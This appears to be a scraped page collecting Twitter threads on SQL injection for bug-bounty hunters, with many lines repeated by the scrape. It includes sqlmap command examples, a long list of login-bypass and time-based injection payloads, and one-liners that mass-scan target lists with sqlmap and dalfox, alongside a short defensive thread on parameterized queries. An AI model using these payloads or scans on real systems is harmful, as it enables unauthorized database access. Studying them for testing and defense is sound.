Discover and read the best of Twitter Threads about #SQLi
Most recents (7)
π± I asked ChatGPT "What are some of the unpopular SQL injection areas" and this is what it replied.
π§΅π
#bugbounty #cybersecurity #infosec #sqli
π§΅π
#bugbounty #cybersecurity #infosec #sqli
1. Error messages: Sometimes error messages can reveal important information about the application's database, such as table names or column names. An attacker can use this information to craft a SQL injection attack.
2. Search fields: Search fields are often overlooked when testing for SQL injection vulnerabilities, but they can be an easy target for attackers. In un-sanitized search queries, an attacker can inject SQL code to retrieve sensitive data from the database.
Hey ReconOne fam! I've personally used Sqlmap on several occasions and it has proven to be a valuable tool in my security arsenal.
Let's dive into some of its features
ππ§΅
#sqlmap #sqli #bugbountyhelp #bugbounty #AttackSurface
Let's dive into some of its features
ππ§΅
#sqlmap #sqli #bugbountyhelp #bugbounty #AttackSurface
1/7 Sqlmap against potential vulnerable Page
$ sqlmap -u https://example. com/page?id=1 -v 3
$ sqlmap -u https://example. com/list --data id=1
$ sqlmap -u https://example. com/internal --cookie=PHPSESSIDabcdef
$ sqlmap -u https://example. com/page?id=1 -v 3
$ sqlmap -u https://example. com/list --data id=1
$ sqlmap -u https://example. com/internal --cookie=PHPSESSIDabcdef
2/7 Test injection in a specific parameter
$ sqlmap -u https://example. com/page? id=1&page=4&sort=desc&env=*
$ sqlmap -u https://example. com/form --data 'name=asd&page=4&role=admin' -p role
$ sqlmap -u https://example. com/page? id=1&page=4&sort=desc&env=*
$ sqlmap -u https://example. com/form --data 'name=asd&page=4&role=admin' -p role
Login Bypass π΅
#SQLi
param='
param="
param=' or 1=1
param=' or 1=0
param=' and 1=1
' or sleep(2) and 1=1#
' or sleep(2)#
admin' and sleep(2)#
' union select sleep(2),null#
' union select sleep(2),null,null,null,null#
#cybersecurity #hacking #bugbountytips #infosec
1/9 ππΏβ
#SQLi
param='
param="
param=' or 1=1
param=' or 1=0
param=' and 1=1
' or sleep(2) and 1=1#
' or sleep(2)#
admin' and sleep(2)#
' union select sleep(2),null#
' union select sleep(2),null,null,null,null#
#cybersecurity #hacking #bugbountytips #infosec
1/9 ππΏβ
param=' or 1=1#
param=' or 1=1
param=' or 1=1 //
param= or 1=1#
param=and or 1=1#
param=' or 1=1
This is the most classic, standard first test:
' or '1'='1
Then you have:
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
#cybersecurity #hacking #bugbountytips
2/9 ππΏβ
param=' or 1=1
param=' or 1=1 //
param= or 1=1#
param=and or 1=1#
param=' or 1=1
This is the most classic, standard first test:
' or '1'='1
Then you have:
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
#cybersecurity #hacking #bugbountytips
2/9 ππΏβ
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
3/9 ππΏβ
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
3/9 ππΏβ
#Secret2
Bug Bounty with One-Line Bash Scriptsπ΅π
You can mention your favorite script. I will add them to this thread.
#BugBounty #BugBountyTip
#100BugBountySecrets
π§΅ππ»
Bug Bounty with One-Line Bash Scriptsπ΅π
You can mention your favorite script. I will add them to this thread.
#BugBounty #BugBountyTip
#100BugBountySecrets
π§΅ππ»
1/ #Secret2
π― Hunt #XSS:
ππ» cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
ππ» cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
#BugBounty #BugBountyTip
#100BugBountySecrets
π§΅ππ»
π― Hunt #XSS:
ππ» cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
ππ» cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
#BugBounty #BugBountyTip
#100BugBountySecrets
π§΅ππ»
2/ #Secret2
π― Hunt #SQLi:
ππ»httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
#BugBounty #BugBountyTip
#100BugBountySecrets
π§΅ππ»
π― Hunt #SQLi:
ππ»httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
#BugBounty #BugBountyTip
#100BugBountySecrets
π§΅ππ»
A thread on available free video resource on SQL Injection .
Retweet to share these resources with everyone.
#bugbountytips #cybersecurity #sqli
Retweet to share these resources with everyone.
#bugbountytips #cybersecurity #sqli
2. We can get a comprehensive knowledge about SQL Injection with the help of this video by @freeCodeCamp
#JS is an obfuscator. #javascript #react #sqli #caretbrowsing #goingindry
#Elixir #Erlang #XML #lolWhatsXML
#Elixir #Erlang #XML #lolWhatsXML
#favicons are #SVG with #XML payloads easily injected by malicious programs. #KHTML has been around for a very long time and this methodology of obfuscation has been in development since #NetscapeNavigator
whats a #favicon?
ππππ ππ₯°ππ ππ₯° lol dunno, sry bruh
ππππ ππ₯°ππ ππ₯° lol dunno, sry bruh
Right, #sqli or #sqlinjection.
Let's talk about it a little.
The concept is simple. Your code allows someone to place additional SQL commands in it. That "injected" code enables data access and/or system hacking (depending on the security in place).
Let's talk about it a little.
The concept is simple. Your code allows someone to place additional SQL commands in it. That "injected" code enables data access and/or system hacking (depending on the security in place).
The problem, and the solution, has been well defined since 1998.
Simply put:
Parameterize the query
Escape the input
Have proper security in place
Use correct data types
In a nutshell. There's a ton more details, but that covers the basics.
Simply put:
Parameterize the query
Escape the input
Have proper security in place
Use correct data types
In a nutshell. There's a ton more details, but that covers the basics.
If you want a more thorough overview of what #SQLi consists of and you don't feel real nerdy at the moment, start with Wikipedia. They have it covered: en.wikipedia.org/wiki/SQL_injecβ¦
